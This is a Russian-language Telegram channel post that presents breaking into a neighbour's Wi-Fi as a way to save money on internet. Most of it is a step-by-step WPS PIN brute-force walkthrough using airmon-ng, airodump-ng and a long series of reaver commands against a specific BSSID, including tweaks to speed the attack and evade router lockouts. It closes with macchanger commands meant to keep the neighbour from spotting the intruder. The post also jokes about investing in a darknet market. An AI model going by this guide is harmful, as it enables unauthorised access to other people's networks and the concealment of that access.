Join
Risk Dark Money
@ridm
Мамин компутерщик
July 19, 2020

Мамин компуктерщик | Взлом wi-fi соседа

Привет подписчик, в телеграмме ты не раз натыкался на “статьи о компуктерах”, но всегда пропускал. Людям свойственно ограждать себя от вещей, не вписывающихся в сферу их интереса.

компуктерщики

Когда-то точно так же было и со мной, и теперь с высоты своего опыта я могу заявить, что это полезный навык в моей жизни. Это инвестиция, которой я хочу поделиться с вами.

Наблюдая за работой профессионала, будь то гитариста или карманника, любой человек в глубине души чувствует себя лохом. Это более чем нормальная реакция. Фактически это лишь оценочное сравнения себя с другим человеком. А теперь представьте, какое количество людей вообще не притрагивались к этому делу, людей которых интересует только акции в пятёрке или выхлоп на новой тачке академика. Инвестируя своё время в такие узкие темы, в короткий промежуток, вы обгоните нереальную массу людей, которые выбрали тик-ток.

Я здесь, что бы рассказать об экономике и инвестициях (это тематика канала, ха), как видите инвестицию мы уже обсудили.

Сейчас, путём не хитрых нажатий клавиш мы разберёмся, как четыре часа вашего времени превратятся в пассивных доход без мам, пап и хуёвых бизнес тренингов. Экономия это тот же доход, вы тратите время на то, что бы платить меньше, а свободные деньги вкладываете в акции гидры. Всё просто.

Для начала разберёмся с ключевой возможностью, благодаря которой вы читаете этот текст - интернетом. Когда ЕГЭ уже позади, наступает момент, когда он, представьте себе, кончается. Да, теперь за интернет приходится платить самому. И в расчёте на самый простой цена-качество тариф, это обойдётся минимум в 12 тысяч в год.

Теперь другая цифра: 250 рублей в час – средняя оплата самого дешевого труда. Тогда, доверив свой анус врачу и получив трудовую книжку, за четыре часа вы сможете оплатить свой интернет на месяц. Если же вы не любитель подставлять очко, то следуя моим рекомендациям, за четыре часа вашего времени вы обеспечите интернет на год. Как тебе такое, Илон Маск?

Так зачем платить за то, что можно получить бесплатно?

Мои статьи о компуктерах:

Комплектующие для игр на высоких настройках в Full HD при +70fps.

Сборка ПК без помощи "Миши ПКмастера".

Установка Windows и всех драйверов.

Что такое MAC?

Что такое ? MAC (Media Access Control)-это уникальный номер, который присваивается каждому сетевому оборудованию при изготовлении на заводе (wi-fi адаптер, роутер, смартфон и так далее)

Зачем нужен? MAC, как номер у автомобиля.

Подробности. MAC уникален для каждого сетевого оборудования, например, у вашего ноутбука два адреса: один у wi-fi адаптера, второй у порта интернета. У роутера MAC уникален для каждого порта проводного интернета.

Для чего менять MAC?

В чем заключается опасность раскрытия MAC? Вообщем, что такое MAC вы поняли. Так для чего же я вам рассказываю про MAC? Дело в том, что хакеры скрывают свой MAC, чтобы их ПК не опознали при атаке. Знание вашего MAC приведет к раскрытию вашего адреса проживания. Например, есть скрипт для сопоставления MAC с географическими координатами, называется iSniff-GPS встроенный в Kali Linux.

Как наш взлом могут обнаружить? А нам то от кого MAC скрывать, мы же не Пентагон взламываем. Дело в том, что ваш сосед может оказаться не таким уж и лохом. Посмотрев в настройках роутера (там видно имя устройства, ip адрес и MAC) кто подключен, при этом зная свои данные можно выявить левого типа и отлучить от интернета. В конце статьи я расскажу как изменить MAC.

Процесс взлома

Wi-Fi сеть-называю WF

Основные способы взлома Wi-Fi сетей:

  1. перехват хендшейков
  2. стратегия Wifiphisher
  3. подбор WPS на WF

Почему я выбрал 3-ий способ? Я расскажу о подборе WPS на Wi-Fi , поскольку считаю первый слишком запутанным способом, а второй слишком палевным. Что я имею ввиду? Второй способ заключается в том, чтобы устроить DDoS атаку на WF соседа и вынудить его подключиться к созданной вами точкой WF с таким же названием. Подключившись к вашей точке, у соседа в браузере вылезает окно с просьбой ввести пароль из за обновления прошивки. Как то это подозрительно?

Что от вас нужно? Для взлома нам понадобится установить Kali Linux в нем нам нужна программа Reaver.

Как работает способ подбора WPS? Reaver взламывает WF методом подбора пина.

Пин-это изначальный пароль WF написанный снизу роутера.

В среднем Reaver раскрывает пароль WF с защитой WPA/WPA2 за 2-5 часов.

Подготовка. Перед тем как запустить Reaver нам нужно будет узнать две вещи: имя WF и BSSID. Как их узнать я напишу во взломе. Теперь остается только запустить Reaver, если начнет затягиваться взлом прибегнуть к моим инструкциям по ускорению и немного подождать.

Примечание. Для успешного взлома на WF должен быть включен WPS. Если пин правильно подобран то, WF сама выдаст нам пароль. Reaver справится даже с зашитой WPA PSK.

Сколько Reaver перебирает пинов?

Как вы поняли ранее Reaver занимается тем, что перебирает пины. Пин: это восьмизначное число. Кроме верного пина никакой больше информации не нужно.

Сейчас вы узнаете как путем нехитрых вычислений понять сколько комбинаций проверяет Reaver во время подбора WPS. Ранее я упоминал что WPS состоит из 8 чисел, а значит существует 10^8 (100,000,000) комбинаций пина. Последняя цифра известна, поэтому круг комбинаций сужается. Также пин делится на 2 части. Картина теперь следующая для первой половины 10^4 (10,000) комбинаций,а для второй — всего 10^3 (1,000) комбинаций. Получается 11,000 комбинаций.

Взлом

Wi-Fi сеть называю WF
Роутер называю P

Сначала наберите команду:

# airmon-ng

Чтобы узнать название интерфейса, введите команду ниже. Нам нужен интерфейс <wlano>.

# airmon-ng start wlan0

Для успешного взлома нам нужно узнать две вещи: имя WF и BSSID WF. Чтобы узнать какие WF находятся поблизости и их BSSID введите:

# airodump-ng --wps wlan0mon

В списке для взлома я выбираю WF Redmi её BSSID — 4C:72:B9:FE:B8:0C.

Имя WF и ее BSSID у нас есть. Останавливаем airodump-ng и запускаем Reaver.

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C

Канал и SSID нужной WF будет автоматически найдена Reaver'ом. Введите:

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -c 4 -e Redmi

Если WF переключает каналы Reaver будет одновременно переключать каналы.

Каналы можно зафиксировать командой

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fixed

Ускорение взлома. Как я ранее говорил Reaver взламывает WF за несколько часов. Reaver нужно столько времени потому, что Р делает паузу между попытками ввода пина в 1 секунду, некоторые делают 5 секунд. Однако можно сократить время между паузами.

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -t 2

Минимальный период между вводом пина 1 секунда, но можно поставить без задержки:

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0

Возможная неполадка. Когда Р обнаруживает подозрительную активность, то блокируется WPS состояние состояние на 5 минут. В этом случае Reaver будет повторять попытки ввода каждые 5 минут. Я считаю это слишком долго, давайте ускорим

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --lock-delay=250

Необязательно. Если хотите увидеть каждую попытку ввода пина, то введите команду внизу два раза:

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv

Минимальный период между ответами M5 и M7 WPS — 0.1 секунды. Можно задать автоматический период таймаута:

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -T .5

Устранение неполадки. Есть еще одна неприятная вещь связанная с вводом пина. Некоторые версии WPS разрывают соединение, если введён неверный пин. Вместо разрыва соединения они должны отправлять сообщение NACK. Для улучшения совместимости NACK лучше отключить.

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --nack

Также большинство Р не закрывают сессию WPS автоматически:

# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --eap-terminate

Если случается 10 ошибок подряд, то появится предупреждение. Происходит это из за того что Р ограничивает скорость ввода пина. Из за этого программа Reaver может войти в режим сна. Об этом сигнализирует сообщение:

# eaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fail-wait=360

Включаем турбо режим

1. Убираем задержку между попытками ввода пина. Однако некоторые Р могут не выполнить такую команду.

#reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0

2. Заставляем Reaver пользоваться короткими номерами Диффи-Хеллмана, чтобы Р быстрее обрабатывал команды:

#reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --dh-small

3.Атака Pixiewps работает не на всех роутерах. Активировать ее можно добавив

-K 1 в конце. Команда выглядит вот так:

#reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -K 1

В случае если атака успешно совершена, то программа выдаст вам пароль. Если нет, то внимательно проверьте все ли вы правильно сделали.

Изменение MAC адреса

После взлома нам нужно изменить MAC.Нам нужна программа macchanger уже встроенная в Kali Linux.

Внимание. Вместо названия интерфейса wi-fi я буду писать сокращенно wi-fi, меняй на название своего интерфейса. Тут стоит прояснить, что название интерфейса wi-fi это не название вашей сети wi-fi, это название встроенного wi-fi передатчика в ПК или ноутбук.

Для начала нужно отключить интернет. Вместо wi-fi нужно написать название интерфейса wi-fi:

$ sudo ip link set dev <wi-fi> down

Введя команду ниже вы узнаете свой текущий MAC

$ sudo macchanger -s wi-fi

Программа выдаст нам, например:

Current MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

Permanent MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

Теперь меняем MAC на рандомный. К двум предыдущий строкам добавится еще одна:

$ sudo macchanger -r wi-fi

Если хотите написать MAC адрес сами то добавьте -m. Вместо MAC вставьте какой вы желаете.

$ sudo macchanger -m <MAC> wi-fi

Для того чтобы вернуть изначальный MAC, введите:

$ sudo macchanger -p wi-fi

На этом изменение MAC закончено.

Автор канала ни к чему вас не призывает. Статьи написано с целью познакомить вас с миром компуктеров и показать, что на компьютере можно не только в дотку играть.

Риски тают в зубах, как ириски
July 19, 2020, 17:50
0 views
0 reactions